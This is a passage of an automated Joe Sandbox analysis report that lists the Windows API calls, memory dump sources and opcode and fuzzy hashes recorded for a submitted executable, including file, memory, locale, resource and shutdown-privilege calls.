APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
• Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
• Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
• Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
APIs
• SetEndOfFile.KERNEL32(?,02137CA4,0040A08C,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
• Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                          • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                          • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                          • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                          APIs
                                                                          • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrev
                                                                          • String ID:
                                                                          • API String ID: 122130370-0
                                                                          • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                          • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                          • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                          • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                          • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                          • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                          • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                          • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                          • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                          • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                          • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                          • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                          • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                          • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                          • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                          • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                          • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                          • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                          • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                          • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: SystemTime
                                                                          • String ID:
                                                                          • API String ID: 2656138-0
                                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID:
                                                                          • API String ID: 1889659487-0
                                                                          • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                          • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                          • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                          • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                          • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                            • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                          • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                          • LocalFree.KERNEL32(005DF6A0,00000000,00401AB4), ref: 00401A1B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,005DF6A0,00000000,00401AB4), ref: 00401A3A
                                                                          • LocalFree.KERNEL32(005E06A0,?,00000000,00008000,005DF6A0,00000000,00401AB4), ref: 00401A79
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                          Memory Dump Source
